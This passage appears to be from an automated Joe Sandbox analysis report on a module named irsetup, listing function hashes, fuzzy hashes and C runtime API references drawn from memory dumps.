                                                                                                                    • Opcode Fuzzy Hash: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
                                                                                                                    • Instruction Fuzzy Hash: D1416D31212B4885EAE3DB11E8817DA63A4B78C7C4F64C025BA8D437A7EF78C65D8742
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
                                                                                                                    • Instruction ID: a7b466250e8cbf9d99a39da3f19165df2e40a545f04f40789bff1e1118104bb7
                                                                                                                    • Opcode Fuzzy Hash: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
                                                                                                                    • Instruction Fuzzy Hash: 0E31073261068841F797AF26A8827EE7751B7C97E0F56C616FA69077D2CE38C609C700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
                                                                                                                    • Instruction ID: e70739f4f642107e89704e3f638af8b430b091e6b205e4125928beaead29ef60
                                                                                                                    • Opcode Fuzzy Hash: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
                                                                                                                    • Instruction Fuzzy Hash: 1531F332611A8841E793AFA6A8417EE3651B7897F0F52C316FE3907BD6CE38C245C700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
                                                                                                                    • Instruction ID: d9038f30b84bd084f134f145b4ea9161b6956bb9982c7eca4ea7920d869c151e
                                                                                                                    • Opcode Fuzzy Hash: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
                                                                                                                    • Instruction Fuzzy Hash: 20310432610A9841E793AF26A8427EE3651B789BE0F52C616BE650B7D2CF38C6098700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
                                                                                                                    • Instruction ID: ec033c54c6d7d521fc6e23a01929881988fa191f7bf2fc9d76832262eb4df226
                                                                                                                    • Opcode Fuzzy Hash: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
                                                                                                                    • Instruction Fuzzy Hash: 5131E132614ADC41E7A3AF35A841BAE3751B7897E0F65C616FA25077D2CF38C6088B02
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 280878599-0
                                                                                                                    • Opcode ID: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
                                                                                                                    • Instruction ID: 68bd96f5714e3ffe11f7f818daa76e97712db3409049de95b658a461dfe5d033
                                                                                                                    • Opcode Fuzzy Hash: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
                                                                                                                    • Instruction Fuzzy Hash: 1511003060168882EBE35FA5A5503BE2760A78DBF0F26C310F976037E9CE38C659CB01
                                                                                                                    APIs
                                                                                                                    • GetStartupInfoA.KERNEL32 ref: 000000018002C855
                                                                                                                      • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
                                                                                                                    • GetFileType.KERNEL32 ref: 000000018002C9D2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 1527402494-2766056989
                                                                                                                    • Opcode ID: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
                                                                                                                    • Instruction ID: 230c68c653191f54178d303bf2b0e4d8cf0cc3789bfed5754acc8c55ed461bfd
                                                                                                                    • Opcode Fuzzy Hash: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
                                                                                                                    • Instruction Fuzzy Hash: 43916232214A8881E7A3CB29D448BA827A5F3097F8F65C715E679473E1DF79C94AC313
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: +$-$0$0
                                                                                                                    • API String ID: 3432092939-699404926
                                                                                                                    • Opcode ID: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
                                                                                                                    • Instruction ID: cdf1d1b669f77c7e48de24e0b0f5a27944c92b146814c4b507a9b0648c28b355
                                                                                                                    • Opcode Fuzzy Hash: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
                                                                                                                    • Instruction Fuzzy Hash: 2B71D332904E8C81F7F78A25E4553FA26D2B7897D4F29C116FF56023D1DF68CA498342
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_fread_nolock
                                                                                                                    • String ID: %lf$invalid format$invalid option$too many arguments
                                                                                                                    • API String ID: 1771911937-3304058045
                                                                                                                    • Opcode ID: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
                                                                                                                    • Instruction ID: 4ecbb218ed77667f7209945df211a99de47e7cbe1f5077c6477dde9f3f5f1065
                                                                                                                    • Opcode Fuzzy Hash: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
                                                                                                                    • Instruction Fuzzy Hash: 9A51F13120464C86FAE7E62656517FE73416B8EBE0F85C112BD060B7C7DE28CB0E8391
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2918714741-0
                                                                                                                    • Opcode ID: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
                                                                                                                    • Instruction ID: 529fb29261052428e6b08158eb4e60c077481b13b416dc635a86f518e286f846
                                                                                                                    • Opcode Fuzzy Hash: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
                                                                                                                    • Instruction Fuzzy Hash: 1931F631B10A8C45F7A7AF79A8963EF2751A7897D0F16C61DBA25073D2CF788608C704
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: DecodePointer_errno
• String ID:
• API String ID: 3485708101-0
• Opcode ID: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
• Instruction ID: a4978cb5b150d70a31ac02c29fe7af899a0e20301038a663c4a8e9806da71e5f
• Opcode Fuzzy Hash: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
• Instruction Fuzzy Hash: 4421D73171068886F793BB25D4113EE6351B7997D5F14C512BA5D0BAC3DF78CA08C701
APIs
• _FF_MSGBANNER.LIBCMT ref: 000000018002D233
  • Part of subcall function 000000018002F154: GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
  • Part of subcall function 000000018002082C: ExitProcess.KERNEL32 ref: 000000018002083B
  • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
  • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
• _errno.LIBCMT ref: 000000018002D275
• _lock.LIBCMT ref: 000000018002D289
• free.LIBCMT ref: 000000018002D2AB
• _errno.LIBCMT ref: 000000018002D2B0
• LeaveCriticalSection.KERNEL32(?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC,?,?,?,000000018001E8ED), ref: 000000018002D2D6
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
• String ID:
• API String ID: 1024173049-0
• Opcode ID: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
• Instruction ID: 6158d1e52bbdfd4d1479ce80147eb334c54af6b62df8d85375debdae957d05bd
• Opcode Fuzzy Hash: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
• Instruction Fuzzy Hash: CD215831615A4C82F6E7AB50A9403EA6395A79D7C4F05C026BA4A877C6CFB8CA4C8340
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: _errno$AttributesDecodeErrorFileLastPointer__doserrno
• String ID:
• API String ID: 24609805-0
• Opcode ID: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
• Instruction ID: 62db423ae1bf48e4f4470d80ab43833ba7cfcbac53acf032b2a4a70ed809b53f
• Opcode Fuzzy Hash: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
• Instruction Fuzzy Hash: 2B019E7161058C46FBF36B789A123FE23905F8E3D0F84C635FA15423CACE284A088711
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: _ctrlfp$_set_exp_umatherr
• String ID:
• API String ID: 3511029064-0
• Opcode ID: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
• Instruction ID: b049e6e4e90f587d1ae26f8248ab9d02cc25cde2fa3ace03e7f94499fe5c5a36
• Opcode Fuzzy Hash: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
• Instruction Fuzzy Hash: 33413871E08E4C85F6A35A3489513EEA385DF9E3D5F11C325B9022B6F6DF18969E4300
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
• String ID:
• API String ID: 2210154019-0
• Opcode ID: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
• Instruction ID: 99c728c995c363288e4645a8cfd7ec9812841acb19d10564c0c81df42c91df12
• Opcode Fuzzy Hash: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
• Instruction Fuzzy Hash: FF317135614A8C86FBA2CB10E8443A76361F78A7B8F619315F66A066E4CF7DC78D8740
APIs
• GetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C25E
• FlsGetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C26C
• SetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C2C4
  • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
• FlsSetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C298
• free.LIBCMT ref: 000000018002C2BB
• GetCurrentThreadId.KERNEL32 ref: 000000018002C2AC
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: ErrorLastValue_lock$CurrentSleepThreadfree
• String ID:
• API String ID: 3106088686-0
• Opcode ID: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
• Instruction ID: 0dfceef3c332b8433fd22f826c40fe3083664a76df6c8c25525dd3dfe5458ebd
• Opcode Fuzzy Hash: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
• Instruction Fuzzy Hash: 63017135201B08C2FBE79BA5A5847A92391AB4CBE0F09C625F926423D5DE38D64D8711
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
• Instruction ID: 4b4e489caf5932047fa857d54ce27d1b13f5d9450eda61c6167a0ffc8242f040
• Opcode Fuzzy Hash: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
• Instruction Fuzzy Hash: 1F01AD72600C0C91EBE3EB61D4A23F96360A7CC7C8F46C043F51E876A6CE24DB888725
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
• Instruction ID: a769455a77138ef5747765841ac36d0ccc4094dbcb8b52754ceed79c47d1f62a
• Opcode Fuzzy Hash: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
• Instruction Fuzzy Hash: EEB17332714B8885EBA3DF62E4507DAB7A4F789BC4F408126BA8E47795DF38C219C740
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
• Instruction ID: 12e77770c186e875bdaf3e9738c6c902f4d3ba9da1e990d93e387186277e3745
• Opcode Fuzzy Hash: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
• Instruction Fuzzy Hash: 0851A832514D8C85F2F79F34B4963EBA351BB4A7D4F12C219BA562A5E0EF348B8D8700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 8016435-0
                                                                                                                    • Opcode ID: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
                                                                                                                    • Instruction ID: d9f390f5e57b81c544825edcb0cf6f397babacc6c857381744f7d8a64d4c1da9
                                                                                                                    • Opcode Fuzzy Hash: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
                                                                                                                    • Instruction Fuzzy Hash: 87518F322047888AFBE79B2694417EE63A1F7A8BC5F54C015FE4947B86DF38CA0D8701
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_set_statfp$_call_matherr_exception_enabled_raise_exc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 932658401-0
                                                                                                                    • Opcode ID: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
                                                                                                                    • Instruction ID: 8ea2834ca092981a7e33b9b2295afd33eedbb5ae56d736279697e7e8cc69432a
                                                                                                                    • Opcode Fuzzy Hash: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
                                                                                                                    • Instruction Fuzzy Hash: 8D313D32608EC886D672DB15E4413EBB365FBCE394F154225FA8C5BB58DF39C5498B40
                                                                                                                    APIs
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F42D
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F43C
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4B9
                                                                                                                      • Part of subcall function 000000018002C04C: realloc.LIBCMT ref: 000000018002C077
                                                                                                                      • Part of subcall function 000000018002C04C: Sleep.KERNEL32(?,?,00000000,000000018002F4A9,?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002C093
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4C8
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
